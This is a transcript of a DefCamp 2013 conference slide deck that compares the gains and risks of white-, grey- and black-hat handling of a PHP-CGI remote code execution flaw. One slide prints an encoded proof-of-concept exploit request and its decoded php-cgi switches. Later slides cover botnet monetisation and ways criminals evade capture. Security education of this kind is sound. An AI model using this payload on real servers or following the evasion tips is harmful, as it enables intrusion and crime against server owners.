Defcamp 2013 - Does it pay to be a blackhat hacker
-
Upload
defcamp -
Category
Technology
-
view
7.082 -
download
0
description
Transcript of Defcamp 2013 - Does it pay to be a blackhat hacker
![Page 1: Defcamp 2013 - Does it pay to be a blackhat hacker](https://reader033.fdocuments.us/reader033/viewer/2022051818/54bd12004a795959428b4714/html5/thumbnails/1.jpg)
DOES IT PAY TO BE A BLACKHAT HACKER?
DefCamp Romania – November 29, 2013Speaker: Dan Catalin VASILE
![Page 2: Defcamp 2013 - Does it pay to be a blackhat hacker](https://reader033.fdocuments.us/reader033/viewer/2022051818/54bd12004a795959428b4714/html5/thumbnails/2.jpg)
About me
• Information Security Consultant• OWASP Romania Board Member• InfoSec Researcher / Writer / Presenter
http://www.pentest.ro
![Page 3: Defcamp 2013 - Does it pay to be a blackhat hacker](https://reader033.fdocuments.us/reader033/viewer/2022051818/54bd12004a795959428b4714/html5/thumbnails/3.jpg)
Agenda
• What is a hacker?• Different types of hats• A real world vulnerability• Exploitation
– White– Grey– Black
• Gains and risks• Conclusion
![Page 4: Defcamp 2013 - Does it pay to be a blackhat hacker](https://reader033.fdocuments.us/reader033/viewer/2022051818/54bd12004a795959428b4714/html5/thumbnails/4.jpg)
What is a hacker?Original definition (MIT 1960s & RFC 1392)A person who delights in having an intimate understanding of the internal workings of a system, computers and computer networks in particular.
Main-stream media definition & general public acceptance (also in RFC 1392)Mass media and general public's usage of the word hacker refers to security breakers motivated mainly by financial gains.
Hackers may be motivated by a multitude of reasons, such as profit, protest, or challenge.
![Page 5: Defcamp 2013 - Does it pay to be a blackhat hacker](https://reader033.fdocuments.us/reader033/viewer/2022051818/54bd12004a795959428b4714/html5/thumbnails/5.jpg)
Different kinds of hatsWhite hatAn ethical computer hacker, or a computer security expert, who specializes in penetration testing and in other testing methodologies to ensure the security of an organization's information systems.
Grey hatA skilled hacker whose activities fall somewhere between white and black hat hackers in a variety of practices. Sometimes he acts illegally, though in good will, to identify vulnerabilities in computing processes.
Black hatA hacker who violates computer security for little reason beyond maliciousness or for personal gain.
![Page 6: Defcamp 2013 - Does it pay to be a blackhat hacker](https://reader033.fdocuments.us/reader033/viewer/2022051818/54bd12004a795959428b4714/html5/thumbnails/6.jpg)
A real world vulnerabilityApache Web Server :: remote code execution
Where?In the default installation of php5-cgi package.
The problemPHP-CGI-based setups contain a vulnerability when parsing query string parameters from php files.
DescriptionWhen the php-cgi receives a processed query string parameter as command line arguments which allows command-line switches, such as -s, -d or -c to be passed to the php-cgi binary, which can be exploited to disclose source code and obtain arbitrary code execution.
![Page 7: Defcamp 2013 - Does it pay to be a blackhat hacker](https://reader033.fdocuments.us/reader033/viewer/2022051818/54bd12004a795959428b4714/html5/thumbnails/7.jpg)
A real world vulnerabilityApache Web Server :: remote code execution
The vulnerabilityIn the source code file sapi/cgi/cgi_main.c of PHP we can see that the security check is done when the php.ini configuration setting cgi.force_redirect is set and the php.ini configuration setting cgi.redirect_status_env is set to NULL.
It is possible to set cgi.force_redirect to zero and cgi.redirect_status_env to zero using the -d switch so that php-cgi gets fully executed and we can use the payload in the POST data field to execute arbitrary php.
STD_PHP_INI_ENTRY("cgi.force_redirect","1", PHP_INI_SYSTEM, OnUpdateBool,force_redirect, php_cgi_globals_struct, php_cgi_globals)STD_PHP_INI_ENTRY("cgi.redirect_status_env", NULL, PHP_INI_SYSTEM, OnUpdateString, redirect_status_env, php_cgi_globals_struct, php_cgi_globals)
![Page 8: Defcamp 2013 - Does it pay to be a blackhat hacker](https://reader033.fdocuments.us/reader033/viewer/2022051818/54bd12004a795959428b4714/html5/thumbnails/8.jpg)
A real world vulnerabilityApache Web Server :: remote code execution
Impact!!!
A remote unauthenticated attacker could obtain sensitive information, cause a denial of service condition or may be able to execute arbitrary code with the privileges of the web server.
![Page 9: Defcamp 2013 - Does it pay to be a blackhat hacker](https://reader033.fdocuments.us/reader033/viewer/2022051818/54bd12004a795959428b4714/html5/thumbnails/9.jpg)
A real world vulnerabilityApache Web Server :: remote code executionExploitation PoCchar poststr[] = "POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F" \ "%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64" \ "+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73" \ "%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E" \ "%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63" \ "%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62" \ "%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74" \ "%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68" \ "%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F" \ "%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63" \ "%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73" \ "%%5F%%65%%6E%%76%%3D%%30+%%2D%%6E HTTP/1.1\r\n" \ "Host: %s\r\n" \ "User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26" \ "(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25\r\n" \ "Content-Type: application/x-www-form-urlencoded\r\n" \ "Content-Length: %d\r\n" \ "Connection: close\r\n\r\n%s";
-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
![Page 10: Defcamp 2013 - Does it pay to be a blackhat hacker](https://reader033.fdocuments.us/reader033/viewer/2022051818/54bd12004a795959428b4714/html5/thumbnails/10.jpg)
A real world vulnerabilityApache Web Server :: remote code execution
Show me the numbers
![Page 11: Defcamp 2013 - Does it pay to be a blackhat hacker](https://reader033.fdocuments.us/reader033/viewer/2022051818/54bd12004a795959428b4714/html5/thumbnails/11.jpg)
A tale of three
Alice Bob Mallory
![Page 12: Defcamp 2013 - Does it pay to be a blackhat hacker](https://reader033.fdocuments.us/reader033/viewer/2022051818/54bd12004a795959428b4714/html5/thumbnails/12.jpg)
What are the options?Responsible disclosure
- Let Apache know about the problem- Let them fix it- Allow “some” time for the patch to be installed on most (??)
of the systems- Make the public announcement and get the credit- For some cash you can make Google pay for it
A list of bug bounties programs:https://bugcrowd.com/list-of-bug-bounty-programs/
![Page 13: Defcamp 2013 - Does it pay to be a blackhat hacker](https://reader033.fdocuments.us/reader033/viewer/2022051818/54bd12004a795959428b4714/html5/thumbnails/13.jpg)
What are the options?Sell the vulnerability to a broker
- TippingPoint's Zero-Day Initiative- iDefense's Vulnerability Contributor Program- Vupen’s Threat Protection Program
![Page 14: Defcamp 2013 - Does it pay to be a blackhat hacker](https://reader033.fdocuments.us/reader033/viewer/2022051818/54bd12004a795959428b4714/html5/thumbnails/14.jpg)
What are the options?Exploit it on your own!
- Small scale- A few selected targets
- Very large scale- Internet size attack- Create a botnet of servers
![Page 15: Defcamp 2013 - Does it pay to be a blackhat hacker](https://reader033.fdocuments.us/reader033/viewer/2022051818/54bd12004a795959428b4714/html5/thumbnails/15.jpg)
White Hat AliceEmployer: big consulting corporationAnnual net income: ~$80.000
Approach:- Responsible disclosure
Gains:- Fame- ~$3k / reporting the vulnerabilityhttps://www.google.com/about/appsecurity/patch-rewards/
Risks:- Mainly risk free
![Page 16: Defcamp 2013 - Does it pay to be a blackhat hacker](https://reader033.fdocuments.us/reader033/viewer/2022051818/54bd12004a795959428b4714/html5/thumbnails/16.jpg)
Grey Hat BobEmployer: small web-hosting providerAnnual net income: ~$45.000
Approach:- Exploit it on a small scale- Sell it to a broker- Disclose it anonymously
Gains:- No fame, just some fortune- $50k from the broker- ~$15k / year
Risks:- Legal charges for hacking
![Page 17: Defcamp 2013 - Does it pay to be a blackhat hacker](https://reader033.fdocuments.us/reader033/viewer/2022051818/54bd12004a795959428b4714/html5/thumbnails/17.jpg)
Black Hat MalloryEmployer: self-employed/freelancerAnnual net income: ~$20.000
Approach:- Exploit it on a ‘never-seen’ scale
Phase 1
![Page 18: Defcamp 2013 - Does it pay to be a blackhat hacker](https://reader033.fdocuments.us/reader033/viewer/2022051818/54bd12004a795959428b4714/html5/thumbnails/18.jpg)
Black Hat MalloryPhase 2
Scale? Millions of machines (10+)
![Page 19: Defcamp 2013 - Does it pay to be a blackhat hacker](https://reader033.fdocuments.us/reader033/viewer/2022051818/54bd12004a795959428b4714/html5/thumbnails/19.jpg)
Black Hat MalloryUses for the botnet
• Distributed Denial-of-Service Attacks• Spamming• Sniffing Traffic• Spreading new malware• Advertisement services abuse• Manipulating pools/games/etc• Mass identity theft• Many others
![Page 20: Defcamp 2013 - Does it pay to be a blackhat hacker](https://reader033.fdocuments.us/reader033/viewer/2022051818/54bd12004a795959428b4714/html5/thumbnails/20.jpg)
Black Hat MalloryDDOS
Market price:$200/10k bots/day
Mallory’s price?~200k/day/clientMultiple clients
He can literally make millions every day.
![Page 21: Defcamp 2013 - Does it pay to be a blackhat hacker](https://reader033.fdocuments.us/reader033/viewer/2022051818/54bd12004a795959428b4714/html5/thumbnails/21.jpg)
Black Hat MalloryDDOS
Spamhaus DDOS attack
When?March 2013
How big?300Gbps
![Page 22: Defcamp 2013 - Does it pay to be a blackhat hacker](https://reader033.fdocuments.us/reader033/viewer/2022051818/54bd12004a795959428b4714/html5/thumbnails/22.jpg)
Black Hat MalloryRisks?
Besides being the most wanted cyber-criminal ever?
Going to jail!
Side thoughts- He only uses Bitcoins or alternative untraceable payment
options- He uses money mules to cash out- The botnet gets divided- He moves to a country with no extradition treaty
![Page 23: Defcamp 2013 - Does it pay to be a blackhat hacker](https://reader033.fdocuments.us/reader033/viewer/2022051818/54bd12004a795959428b4714/html5/thumbnails/23.jpg)
AftermathIt takes months (years?) for the Internet to recover after such a breach.
Patching, releasing, clean install, removing all the infections is a painfully long process since the botnet tries to reactivate.
What was real and what was not?
- Apache PHP Vulnerability – REAL- PoC – REAL- the impact – not so real-Black-hat exploitation – science-fiction, yet doable
![Page 24: Defcamp 2013 - Does it pay to be a blackhat hacker](https://reader033.fdocuments.us/reader033/viewer/2022051818/54bd12004a795959428b4714/html5/thumbnails/24.jpg)
A tale of threeAlice Bob Mallory
![Page 25: Defcamp 2013 - Does it pay to be a blackhat hacker](https://reader033.fdocuments.us/reader033/viewer/2022051818/54bd12004a795959428b4714/html5/thumbnails/25.jpg)
Conclusions
Are there any?
Does it pay to be blackhat?It does. Financially. Only!
Do we hunt all blackhats down?
Different shades of gray.